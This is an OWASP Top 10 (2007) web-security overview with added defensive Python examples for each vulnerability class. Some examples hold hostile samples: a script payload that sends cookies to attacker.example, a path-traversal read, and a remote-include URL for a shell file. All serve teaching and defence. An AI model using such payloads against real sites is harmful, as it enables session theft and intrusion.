OWASP Top 10: The Ten Most Critical Web Application Security Vulnerabilities, 2007 Release
A great start, but not a standard.
OWASP Top 10 2007
1. Cross Site Scripting (XSS)
2. Injection Flaws
3. Insecure Remote File Include
4. Insecure Direct Object Reference
5. Cross Site Request Forgery (CSRF)
6. Information Leakage and Improper Error Handling
7. Broken Authentication and Session Management
8. Insecure Cryptographic Storage
9. Insecure Communications
10. Failure to Restrict URL Access
Top 10 Methodology
Take the MITRE Vulnerability Trends for 2006 and distill the Top 10 web application security issues from them.
Top 10 Mapping: OWASP Top 10 2007 against OWASP Top 10 2004 and the MITRE 2006 raw ranking. Cells the extraction lost are marked [not extracted] rather than guessed.

OWASP Top 10 2007                            | OWASP Top 10 2004                               | MITRE 2006 raw ranking
1. Cross Site Scripting (XSS)                | 4. Cross Site Scripting (XSS)                   | 1
2. Injection Flaws                           | 6. Injection Flaws                              | 2
3. Insecure Remote File Include (NEW)        |                                                 | 3
4. Insecure Direct Object Reference          | 2. Broken Access Control (split in 2007 T10)    | 5
5. Cross Site Request Forgery (CSRF) (NEW)   |                                                 | 36
6. Info Leakage and Improper Error Handling  | 7. Improper Error Handling                      | 6
7. Broken Auth. and Session Management       | 3. Broken Authentication and Session Management | 14
8. Insecure Cryptographic Storage            | 8. Insecure Storage                             | 8
9. Insecure Communications (NEW)             | Discussed under [2004 item not extracted]       | [not extracted]
10. Failure to Restrict URL Access           | 2. Broken Access Control (split in 2007 T10)    | 14
(dropped in 2007)                            | 1. Unvalidated Input                            | 7
(dropped in 2007)                            | 5. Buffer Overflows                             | 4, 8, and [not extracted]
(dropped in 2007)                            | 9. Denial of Service                            | [not extracted]
(dropped in 2007)                            | 10. Insecure Configuration Management           | 29
Cross Site Scripting (XSS)

1. Cross-Site Scripting (XSS)
Description:
- The most prevalent web application security issue
- Allows attackers to execute script in the victim's browser
Affected environments:
- All web application frameworks are vulnerable to cross site scripting

Cross-Site Scripting (XSS)
Verifying security:
- All input parameters are validated and/or encoded
- Code reviews are useful for detection
- Look for a centralized validation and encoding mechanism rather than ad hoc checks scattered through the code
Protection:
- A combination of whitelist validation of all incoming data and appropriate encoding of all output data, for the context (HTML body, attribute, JavaScript, URL) the data is written into
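The two halves of the protection bullet, whitelist validation on input and context-specific encoding on output, as an added Python example (not code from the slides or from any OWASP project). The display-name field, the hostile payload and the two HTML contexts are constructed for the example.

```python
import html
import re

# Constructed sample input: a display name submitted through a profile form.
HOSTILE_NAME = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>'

# Whitelist validation: the narrowest character set and length a display name needs.
DISPLAY_NAME_RE = re.compile(r"[A-Za-z0-9 ._'-]{1,40}")


def is_valid_display_name(value: str) -> bool:
    """Positive (whitelist) check: anything outside the allowed set is rejected,
    instead of trying to enumerate the dangerous characters."""
    return DISPLAY_NAME_RE.fullmatch(value) is not None


def encode_for_html_body(value: str) -> str:
    """Output encoding for HTML text content: & < > " ' become entities."""
    return html.escape(value, quote=True)


def encode_for_html_attribute(value: str) -> str:
    """Output encoding for an attribute value: everything outside [A-Za-z0-9]
    is entity-encoded, so even an unquoted attribute cannot be broken out of."""
    return "".join(ch if (ch.isascii() and ch.isalnum()) else f"&#x{ord(ch):X};"
                   for ch in value)


def render_profile_vulnerable(name: str) -> str:
    """Reflects the raw parameter into the page: the browser runs the script."""
    return f"<p>Welcome, {name}</p>"


def render_profile_safe(name: str) -> str:
    """Validate on the way in, then encode on the way out for each context used."""
    if not is_valid_display_name(name):
        name = "anonymous"   # reject; do not try to "clean" hostile input
    return (f'<p data-user="{encode_for_html_attribute(name)}">'
            f"Welcome, {encode_for_html_body(name)}</p>")


if __name__ == "__main__":
    print(render_profile_vulnerable(HOSTILE_NAME))
    print(render_profile_safe(HOSTILE_NAME))
    print(render_profile_safe("O'Brien"))
    print(encode_for_html_body(HOSTILE_NAME))
```

Encoding alone would have made the hostile name harmless in the body context; the whitelist check is there because a name containing angle brackets has no legitimate use, and rejecting it early means the same value cannot reach a context (a JavaScript string, a URL) for which no encoder was applied.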
Cross-Site Scripting (XSS)
References:
- OWASP, Cross site scripting
- OWASP, Testing for XSS
- OWASP Stinger Project (a Java EE validation filter)
- OWASP PHP Filter Project
- OWASP Encoding Project
- RSnake, XSS Cheat Sheet
- Klein, A., DOM Based Cross Site Scripting
- Anti-XSS Library (download link not extracted)
- Wikipedia definition
Injection Flaws

2. Injection Flaws
Description:
- Injection occurs when user-supplied data is sent to an interpreter as part of a command or query
- SQL injection is the most common form
Affected environments:
- All web application frameworks that use interpreters are vulnerable to injection attacks

Injection Flaws
Vulnerabilities:
- If user input is passed into an interpreter without validation or encoding, the application is vulnerable
- Check whether user input is supplied directly to dynamic queries

Injection Flaws
Verifying security:
- Verify that the user cannot modify commands or queries sent to any interpreter used by the application
- Code reviews are useful for detection
Protection:
- Avoid interpreters where possible
- Enforce least privilege for the account the application uses with each interpreter
- Stored procedures are susceptible too if they build dynamic SQL internally; they are not a substitute for parameterized queries
- User input validation
Injection Flaws
References:
- OWASP (four links; titles not extracted)
- SQL Injection
- Advanced SQL Injection
- More Advanced SQL Injection
- Hibernate, an advanced object relational mapper (ORM) for J2EE and .NET
- J2EE Prepared Statements
- How to: Protect from SQL injection in ASP.NET
- PHP PDO functions
Insecure Remote File Include

3. Malicious File Injection
Description:
- Allows attackers to perform remote code execution and similar attacks by compromising input files or streams; commonly caused by improperly trusting input files
Affected environments:
- All web application frameworks that allow uploaded files to be executed are vulnerable
- Environments are susceptible if they allow file upload into web directories

Malicious File Injection
Vulnerabilities:
- Hostile data being uploaded to session files or log data
- PHP is the most common target; other technologies, including Java and .NET, are affected too
- Hostile DTDs in XML documents

Malicious File Injection
Verifying security:
- Code reviews are useful for detection
- Automated tools are useful
Protection:
- Do not allow a user-defined file name to select server-based resources
- Properly configured and implemented platform security policies (sandboxing)
- User input validation
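The first protection bullet (never let a user-supplied name select a server resource) as an added Python example; this is not code from the slides. The template directory, the config file outside it and the include requests are constructed on the fly so the example runs offline. The vulnerable function mirrors the PHP `include($_GET['page'])` pattern; the safe one resolves a request key through a fixed map and then confirms the resolved file is still inside the template root.

```python
import os
import tempfile

# Indirect reference map: the request names a key, never a path. Anything not in
# this map does not exist as far as the include logic is concerned.
TEMPLATE_MAP = {"home": "home.html", "about": "about.html"}


class IncludeError(ValueError):
    """Raised for any request that does not resolve to an allowed template."""


def resolve_template(template_root: str, key: str) -> str:
    if key not in TEMPLATE_MAP:
        raise IncludeError(f"unknown template key: {key!r}")
    root = os.path.realpath(template_root)
    path = os.path.realpath(os.path.join(root, TEMPLATE_MAP[key]))
    # Defence in depth: the resolved file must still live under the template root
    # (catches a bad map entry or a symlink planted in the directory).
    if os.path.commonpath([root, path]) != root:
        raise IncludeError("template resolves outside the template root")
    return path


def include_vulnerable(template_root: str, name: str) -> str:
    """The include($_GET['page']) pattern: the user names the file directly.
    '../' walks out of the directory; in PHP with allow_url_include enabled the
    name can even be a URL to attacker-hosted code."""
    with open(os.path.join(template_root, name), encoding="utf-8") as fh:
        return fh.read()


def include_safe(template_root: str, key: str) -> str:
    with open(resolve_template(template_root, key), encoding="utf-8") as fh:
        return fh.read()


def demo() -> dict:
    """Constructed layout: templates/ holding one page, and a config file one level up."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "templates")
    os.mkdir(root)
    with open(os.path.join(root, "home.html"), "w", encoding="utf-8") as fh:
        fh.write("<h1>home</h1>")
    with open(os.path.join(base, "config.ini"), "w", encoding="utf-8") as fh:
        fh.write("db_password=hunter2")

    results = {
        "vulnerable_traversal": include_vulnerable(root, "../config.ini"),
        "safe_home": include_safe(root, "home"),
    }
    for attempt in ("../config.ini", "http://attacker.example/shell.txt", "home.html"):
        try:
            include_safe(root, attempt)
            results[attempt] = "allowed"
        except IncludeError:
            results[attempt] = "rejected"
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label}: {outcome}")
```

Note that the safe version rejects even `home.html`: the file name is not a valid key, and that is the point. Path canonicalization alone is a weaker control, because it still lets the request supply a path and relies on the check being complete.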
Malicious File Injection
References:
- OWASP Guide
- OWASP Testing Guide
- OWASP PHP Top 5
- Stefan Esser (link not extracted)
- [SIF01] Sift Networks, Web Services: Teaching an old dog new tricks
- Java Security Policy
- Microsoft, Programming for Partial Trust, http://msdn2.microsoft.com/en-us/library/ms364059(VS.80).aspx
Insecure Direct Object Reference

4. Insecure Direct Object Reference
Description:
- Occurs when a developer exposes an unvalidated reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter
Affected environments:
- All web application frameworks are vulnerable to attacks on insecure direct object references

Insecure Direct Object Reference
Vulnerabilities:
- Exposed internal object references
- Attackers use parameter tampering to change references and violate the intended but unenforced access control policy
- References to database keys are frequently exposed

Insecure Direct Object Reference
Verifying security:
- Remove any direct object references that can be manipulated by an attacker
- Difficult for both automated and manual approaches
Protection:
- The best protection is to avoid exposing direct object references to users (use indirect, per-user or per-session references instead)
- Verify authorization to all referenced objects on every request
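Both protection bullets, the ownership check and the indirect reference, as an added Python example that is not code from the slides. The invoice table, the users and the handle scheme are constructed for the example.

```python
import secrets
from typing import Dict, Optional

# Constructed data: invoices keyed by their database primary key.
INVOICES = {
    1001: {"owner": "alice", "total": 120},
    1002: {"owner": "bob", "total": 75},
}


class Forbidden(PermissionError):
    pass


def get_invoice_vulnerable(user: str, invoice_id: int) -> dict:
    """/invoice?id=1002: the parameter is the database key and nothing checks
    that the caller owns it, so bob reads alice's invoice by changing the number."""
    return INVOICES[invoice_id]


def get_invoice_authorized(user: str, invoice_id: int) -> dict:
    """Authorization check on every referenced object. 'Not found' and 'not
    yours' get the same answer so the id space cannot be enumerated."""
    invoice = INVOICES.get(invoice_id)
    if invoice is None or invoice["owner"] != user:
        raise Forbidden("no such invoice for this user")
    return invoice


class IndirectReferences:
    """Per-session map from random handles to real ids. The browser only ever
    sees handles, so there is no meaningful value to tamper with, and a handle
    minted in one session means nothing in another."""

    def __init__(self) -> None:
        self._handles: Dict[str, int] = {}

    def handle_for(self, invoice_id: int) -> str:
        handle = secrets.token_urlsafe(12)
        self._handles[handle] = invoice_id
        return handle

    def resolve(self, handle: str) -> Optional[int]:
        return self._handles.get(handle)


def get_invoice_by_handle(user: str, refs: IndirectReferences, handle: str) -> dict:
    invoice_id = refs.resolve(handle)
    if invoice_id is None:
        raise Forbidden("unknown reference")
    # Indirection is not a substitute for the ownership check; keep both.
    return get_invoice_authorized(user, invoice_id)


if __name__ == "__main__":
    print("vulnerable, bob asks for 1001:", get_invoice_vulnerable("bob", 1001))
    alice_refs = IndirectReferences()
    h = alice_refs.handle_for(1001)
    print("alice via handle:", get_invoice_by_handle("alice", alice_refs, h))
    try:
        get_invoice_by_handle("bob", IndirectReferences(), h)
    except Forbidden as exc:
        print("bob with alice's handle:", exc)
```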
Cross Site Request Forgery (CSRF)

5. Cross Site Request Forgery (CSRF)
Description:
- An attack that tricks the victim into loading a page that contains a malicious request
- Also known as Session Riding, One-Click Attacks, Cross Site Reference Forgery, Hostile Linking, and Automation Attack
Affected environments:
- All web application frameworks are vulnerable to CSRF

Cross Site Request Forgery (CSRF)
Vulnerabilities:
- In a forum, the attack may direct the user to invoke a logout function; any state-changing function the victim is authorized to call can be targeted the same way
- Can be combined with XSS

Cross Site Request Forgery (CSRF)
Verifying security:
- Use an authorization token that is not automatically submitted by the browser (session cookies and HTTP authentication credentials are sent automatically and therefore do not count)
Protection:
- Eliminate any XSS vulnerabilities in your application; script running in the victim's origin can read the token and defeat the protection
- Add a per-request nonce to the URL and all forms in addition to the standard session, if it is not built into your web application framework
- Require additional login screens (re-authentication) for sensitive transactions
- Do not use GET requests for sensitive data or state-changing actions
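The token check and the GET rule from the protection list above, as an added Python example (not the slides' own code). The session object, the transfer endpoint and the forged request are constructed; a real framework would keep the session server-side exactly as the `Session` class does here.

```python
import hmac
import secrets


class Session:
    """Server-side session state. The CSRF token lives here and in the form body,
    never in a cookie, because cookies are exactly what the browser sends on its own."""

    def __init__(self) -> None:
        self.user = "alice"
        self.csrf_token = secrets.token_urlsafe(32)

    def rotate_token(self) -> None:
        self.csrf_token = secrets.token_urlsafe(32)


def render_transfer_form(session: Session) -> str:
    return ('<form method="POST" action="/transfer">'
            f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'
            '<input name="to"><input name="amount"><button>Send</button></form>')


def handle_transfer(session: Session, method: str, params: dict) -> int:
    """Returns the HTTP status the endpoint would answer with."""
    if method != "POST":
        return 405   # never change state on GET: <img src="/transfer?..."> is a GET
    supplied = params.get("csrf_token", "")
    # Constant-time comparison; a plain == leaks the token one byte at a time.
    if not hmac.compare_digest(supplied.encode(), session.csrf_token.encode()):
        return 403   # the cookie arrived automatically, the token did not
    session.rotate_token()   # per-request nonce: a captured token is single use
    return 200


def demo() -> dict:
    session = Session()
    token = session.csrf_token
    results = {"form_has_token": token in render_transfer_form(session)}
    # Forged request from attacker.example: the browser attaches the cookie, so the
    # session is valid, but the attacker's page cannot read the hidden field.
    results["forged_post"] = handle_transfer(session, "POST", {"to": "mallory", "amount": "1000"})
    results["forged_get"] = handle_transfer(
        session, "GET", {"to": "mallory", "amount": "1000", "csrf_token": token})
    results["legit"] = handle_transfer(
        session, "POST", {"to": "bob", "amount": "10", "csrf_token": token})
    results["replayed"] = handle_transfer(
        session, "POST", {"to": "bob", "amount": "10", "csrf_token": token})
    return results


if __name__ == "__main__":
    for label, status in demo().items():
        print(f"{label}: {status}")
```

The forged GET carries a valid token in the example only to show that the method check fires first; in a real attack the attacker has no token at all. The replay result is what the per-request nonce buys over a per-session token: a token that leaks once (in a referrer, a proxy log, a screenshot) cannot be reused.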
Information Leakage and Improper Error Handling

6. Information Leakage and Improper Error Handling
Description:
- Applications can unintentionally leak information about their configuration or internal workings, or violate privacy, through a variety of application problems
Affected environments:
- All web application frameworks are vulnerable to information leakage and improper error handling

Information Leakage and Improper Error Handling
Vulnerabilities:
- Error messages with too much detail
- Stack traces
- SQL statements
- Improper logging of detailed messages

Information Leakage and Improper Error Handling
Verifying security:
- The goal is for the application not to leak detailed error messages
- Automated and manual approaches are both useful, but automated tools cannot properly determine the meaning of a message, and manual review is time consuming
Protection:
- Use testing to generate error messages, and perform ongoing evaluation during development
- Disable or limit detailed error handling: return a generic message to the user and keep the detail in the server-side log
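The last protection bullet as an added Python example (not from the slides): a handler that sends the exception text and stack trace to the client, beside one that logs the detail under a reference id and returns only the reference. The data-layer failure, its revealing message and the in-memory log sink are constructed for the example.

```python
import io
import logging
import traceback
import uuid

# Constructed server-side log sink so the example is self-contained.
LOG_STREAM = io.StringIO()
log = logging.getLogger("app.errors")
log.setLevel(logging.ERROR)
log.propagate = False
log.addHandler(logging.StreamHandler(LOG_STREAM))


def data_layer_lookup(order_id: str) -> dict:
    """Constructed stand-in for a data layer whose exception message reveals
    the query text, the schema and the database host."""
    raise RuntimeError(
        f'query "SELECT * FROM orders WHERE id = {order_id}" failed: '
        'relation "orders" does not exist (db-primary.internal:5432)')


def lookup_order_vulnerable(order_id: str) -> tuple:
    """Default-style handler: exception text and stack trace go to the client."""
    try:
        return 200, data_layer_lookup(order_id)
    except Exception as exc:
        return 500, f"Error: {exc}\n{traceback.format_exc()}"


def lookup_order_safe(order_id: str) -> tuple:
    """Detail goes to the server log under a reference id; the client gets only
    the reference, which support staff can correlate with the log entry."""
    try:
        return 200, data_layer_lookup(order_id)
    except Exception:
        ref = uuid.uuid4().hex[:12]
        log.error("ref=%s unhandled exception\n%s", ref, traceback.format_exc())
        return 500, f"An internal error occurred. Reference: {ref}"


def leaked_terms(body: str) -> list:
    """Which sensitive fragments made it into a response body (a crude check of
    the kind the 'use testing to generate error messages' bullet asks for)."""
    return [t for t in ("SELECT", "db-primary.internal", "Traceback") if t in body]


if __name__ == "__main__":
    print(lookup_order_vulnerable("42")[1])
    print(lookup_order_safe("42")[1])
    print(LOG_STREAM.getvalue())
```

The server-side log still deserves the same scrutiny as the response: it should carry the stack trace and the reference, not the user's password or session token.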
Broken Authentication and Session Management

7. Broken Authentication and Session Management
Description:
- Flaws in authentication and session management most frequently involve the failure to protect credentials and session tokens through their lifecycle
Affected environments:
- All web application frameworks are vulnerable to authentication and session management flaws

Broken Authentication and Session Management
Vulnerabilities:
- Flaws in the main authentication mechanism
- Password management
- Session timeout

Broken Authentication and Session Management
Verifying security:
- The application should properly authenticate users and protect their credentials
- Automated tools have difficulty here
- A combination of code reviews and testing is effective
Protection:
- Maintain secure communication and credential storage
- Use a single authentication mechanism where applicable
- Create a new session upon authentication
- Ensure the logout link destroys all pertinent data
- Do not expose any credentials in URLs or logs
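The session-lifecycle bullets (new session on authentication, logout that destroys state, timeout) as an added Python example that is not the slides' code. The in-memory store, the single user record and the timestamps passed as `now` are constructed so the behaviour can be exercised without waiting for a real timeout.

```python
import secrets
from typing import Optional

# Constructed credential store. A real one holds salted password hashes, never
# plaintext; the comparison below is only about the session logic.
USERS = {"alice": "correct horse battery staple"}


class SessionStore:
    """In-memory sessions keyed by an unguessable id, with an idle timeout.
    'now' is injected so the example is deterministic; production code uses time.time()."""

    def __init__(self, idle_timeout: float = 900.0) -> None:
        self.idle_timeout = idle_timeout
        self._sessions = {}

    def create(self, now: float, user: Optional[str] = None) -> str:
        sid = secrets.token_urlsafe(32)          # 256 bits from the OS CSPRNG
        self._sessions[sid] = {"user": user, "last_seen": now}
        return sid

    def login(self, pre_auth_sid: str, user: str, password: str, now: float) -> Optional[str]:
        """Authenticate, then issue a brand-new session id. The pre-login id is
        discarded so an id the attacker planted beforehand (session fixation)
        never becomes an authenticated one."""
        stored = USERS.get(user)
        if stored is None or not secrets.compare_digest(stored.encode(), password.encode()):
            return None
        self._sessions.pop(pre_auth_sid, None)
        return self.create(now, user)

    def logout(self, sid: str) -> None:
        """Destroy the server-side state; clearing the cookie alone leaves the id valid."""
        self._sessions.pop(sid, None)

    def user_for(self, sid: str, now: float) -> Optional[str]:
        """Resolve a presented id (from a cookie, never a URL) to a user, enforcing
        the idle timeout on every request."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        if now - entry["last_seen"] > self.idle_timeout:
            self._sessions.pop(sid, None)       # expired: treat it like a logout
            return None
        entry["last_seen"] = now
        return entry["user"]


if __name__ == "__main__":
    store = SessionStore()
    pre = store.create(now=0.0)
    sid = store.login(pre, "alice", "correct horse battery staple", now=1.0)
    print("pre-auth id still valid after login?", store.user_for(pre, now=2.0))
    print("authenticated id resolves to:", store.user_for(sid, now=2.0))
    print("after 20 idle minutes:", store.user_for(sid, now=2.0 + 1200))
```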
8. Insecure Cryptographic Storage
Description:
- Simply failing to encrypt sensitive data is very widespread
- Applications that do encrypt frequently contain poorly designed cryptography, either using inappropriate ciphers or making serious mistakes using strong ciphers
Affected environments:
- All web application frameworks are vulnerable to insecure cryptographic storage

Insecure Cryptographic Storage
Vulnerabilities:
- Not encrypting sensitive data
- Using home-grown algorithms
- Insecure use of strong algorithms
- Continued use of proven weak algorithms (MD5, SHA-1, RC4, etc.)
- Hard-coding keys, and storing keys in unprotected stores

Insecure Cryptographic Storage
Verifying security:
- Verify that the application properly encrypts sensitive information in storage
- Automated vulnerability tools are not effective
- Code review is the best way to verify that an application encrypts sensitive data
Protection:
- Use only approved public algorithms
- Check that all sensitive data is being encrypted
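Three of the bullets above in one added Python example (not code from the slides): the weak-algorithm case (unsalted MD5), the approved-algorithm case for the most common stored secret, a password, and key material read from the environment instead of a literal in source. The iteration count, the record format and the environment variable name are the example's own choices. Passwords are the one case where "encrypt" on the slide should be read as "salted, slow one-way hash": nothing ever needs the plaintext back.

```python
import base64
import hashlib
import hmac
import secrets
from typing import Mapping

# Work factor for PBKDF2-HMAC-SHA256 (an assumption; tune upward as hardware allows).
ITERATIONS = 600_000


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Salted, slow, one-way. The record is self-describing so the parameters can
    be raised later and old records re-hashed at the user's next login."""
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (
        iterations, base64.b64encode(salt).decode(), base64.b64encode(dk).decode())


def verify_password(password: str, stored: str) -> bool:
    try:
        algorithm, iterations, salt_b64, dk_b64 = stored.split("$")
    except ValueError:
        return False
    if algorithm != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(dk_b64)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(candidate, expected)


def md5_password_vulnerable(password: str) -> str:
    """The weak-algorithm bullet in practice: unsalted, fast, and identical for
    every user with the same password, so precomputed tables recover it."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def load_data_key(env: Mapping[str, str], name: str = "APP_DATA_KEY") -> bytes:
    """Key material comes from the deployment environment or a key store, never a
    literal in the source tree. 'env' is a mapping so the example runs offline;
    production passes os.environ."""
    raw = env.get(name)
    if raw is None:
        raise RuntimeError(f"{name} is not set; refusing to start with a built-in default")
    key = base64.b64decode(raw)
    if len(key) < 32:
        raise ValueError("data key must be at least 256 bits")
    return key


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print("verify ok:", verify_password("correct horse battery staple", record))
    print("md5 of 'password':", md5_password_vulnerable("password"))
```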
Insecure Cryptographic Storage
References:
- OWASP (four links; titles not extracted)
- PCI Data Security Standard v1.1, https://www.pcisecuritystandards.org/pdfs/pci_dss_v1-1.pdf
- Bruce Schneier (link not extracted)
- Microsoft, CryptoAPI Next Generation (MSDN link not extracted)
Insecure Communications

9. Insecure Communications
Description:
- Applications frequently fail to encrypt network traffic when it is necessary to protect sensitive communications
- SSL/TLS must be used for all authenticated connections
Affected environments:
- All web application frameworks are vulnerable to insecure communications

Insecure Communications
Vulnerabilities:
- Network sniffing
- All authenticated traffic needs to go over SSL/TLS, because HTTP includes the authentication credentials or a session token with every single request, not just the actual login request
- Always use SSL/TLS with sensitive data

Insecure Communications
Verifying security:
- Verify that the application properly encrypts all authenticated and sensitive communications
- Vulnerability scanning tools can verify that SSL/TLS is used on the front end, and can find many SSL-related flaws
- Code review is quite efficient for verifying the proper use of SSL/TLS for all backend connections
Protection:
- Always use SSL/TLS with sensitive data
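The two review targets named above, the front end and the backend connections, as an added Python example (not code from the slides). The front-end handler, the host name and the session id are constructed; the TLS contexts use only the standard `ssl` module and are inspected rather than connected, so nothing goes on the wire.

```python
import ssl

HSTS = "Strict-Transport-Security: max-age=31536000; includeSubDomains"


def build_client_context_vulnerable() -> ssl.SSLContext:
    """The 'make the certificate warning go away' backend client: accepts any
    certificate, so an interceptor on the path terminates the connection and
    reads the traffic."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def build_client_context() -> ssl.SSLContext:
    """Backend connection policy: verify the chain against the trust store,
    check the host name, and refuse protocol versions below TLS 1.2."""
    ctx = ssl.create_default_context()      # CERT_REQUIRED and check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def context_is_acceptable(ctx: ssl.SSLContext) -> bool:
    """The check a code review applies to every outbound TLS context it finds."""
    return (ctx.verify_mode == ssl.CERT_REQUIRED
            and bool(ctx.check_hostname)
            and ctx.minimum_version >= ssl.TLSVersion.TLSv1_2)


def handle_request(scheme: str, host: str, path: str, session_id: str) -> dict:
    """Front end: anything arriving over plain HTTP is redirected before any
    credential or session token is looked at. HTTPS responses carry HSTS, and
    the session cookie is marked Secure so the browser never sends it over HTTP."""
    if scheme != "https":
        return {"status": 301, "headers": [f"Location: https://{host}{path}"]}
    return {"status": 200,
            "headers": [HSTS,
                        f"Set-Cookie: SESSIONID={session_id}; Path=/; Secure; HttpOnly"]}


if __name__ == "__main__":
    print("hardened context acceptable:", context_is_acceptable(build_client_context()))
    print("vulnerable context acceptable:", context_is_acceptable(build_client_context_vulnerable()))
    print(handle_request("http", "shop.example", "/login", "abc123"))
    print(handle_request("https", "shop.example", "/login", "abc123"))
```

The redirect covers the "forgot to use HTTPS" case once; the Secure flag on the cookie is what keeps a later plain-HTTP link from leaking the session token, which is the whole reason every authenticated request, not only the login, must be encrypted.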
Insecure Communications
References:
- OWASP Testing Guide, Testing for SSL/TLS, https://www.owasp.org/index.php/Testing_for_SSL-TLS
- OWASP Guide
- Foundstone, SSL Digger (link not extracted)
- NIST Special Publication, Guidelines for the Selection and Use of Transport Layer Security (TLS) Implementations
- NIST Special Publication, Guide to Secure Web Services
Failure to Restrict URL Access

10. Failure to Restrict URL Access
Description:
- Relying on security by obscurity to restrict URL access
- Not using access control checks for URLs
Affected environments:
- All web application frameworks are vulnerable to failure to restrict URL access

Failure to Restrict URL Access
Vulnerabilities:
- Forced browsing
- Hidden URLs and files
- Outdated security mechanisms
- Evaluating privileges only on the client

Failure to Restrict URL Access
Verifying security:
- Verify that access control is enforced consistently for all URLs in the application
- Automated tools have difficulty verifying URL access control
- A combination of code reviews and testing is effective
Protection:
- Properly architect and implement roles for URL access, enforced on the server for every request
- Ensure all URLs are part of this process; anything not covered by the policy should be denied by default
- Do not use hidden URLs
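A central, server-side URL policy of the kind the protection bullets describe, as an added Python example that is not code from the slides. The route table, the roles and the forced-browsing attempts are constructed; the point is that every request passes through one check, that unlisted URLs are denied, and that the path is canonicalized before matching so encoding tricks do not bypass the policy.

```python
import posixpath
from urllib.parse import unquote

# Central policy: URL prefix -> roles allowed. Anything not listed is denied,
# so a "hidden" URL is simply an unreachable one.
ROUTE_POLICY = [
    ("/admin/", {"admin"}),
    ("/account/", {"user", "admin"}),
    ("/public/", {"anonymous", "user", "admin"}),
]


def canonicalize(path: str) -> str:
    """Decode and normalize before matching, so /account/%2e%2e/admin/ and
    /admin//users compare as the paths the server will actually serve."""
    decoded = unquote(unquote(path.split("?", 1)[0]))   # handle double encoding too
    decoded = "/" + decoded.lstrip("/")                  # collapse leading slashes
    normalized = posixpath.normpath(decoded)
    if decoded.endswith("/") and not normalized.endswith("/"):
        normalized += "/"
    return normalized


def is_authorized(path: str, role: str) -> bool:
    """Server-side, per-request check applied to every URL. Menu hiding and
    JavaScript checks in the client carry no weight here."""
    canonical = canonicalize(path)
    for prefix, roles in ROUTE_POLICY:
        if canonical == prefix.rstrip("/") or canonical.startswith(prefix):
            return role in roles
    return False                                         # deny by default


# Constructed forced-browsing attempts: (path, role of the requester).
ATTEMPTS = [
    ("/public/index.html", "anonymous"),
    ("/admin/backup.jsp", "anonymous"),
    ("/admin/backup.jsp", "admin"),
    ("/account/%2e%2e/admin/users", "user"),
    ("/admin//users", "user"),
    ("/reports/q4-hidden.xls", "user"),
]


def evaluate() -> dict:
    return {f"{role} {path}": is_authorized(path, role) for path, role in ATTEMPTS}


if __name__ == "__main__":
    for label, allowed in evaluate().items():
        print(f"{'allow' if allowed else 'deny '}  {label}")
```

The `/reports/q4-hidden.xls` case is the "hidden URL" from the vulnerability list: the file may well exist on disk, but because no policy entry covers it, the check denies it regardless of who asks, which is the opposite of obscurity.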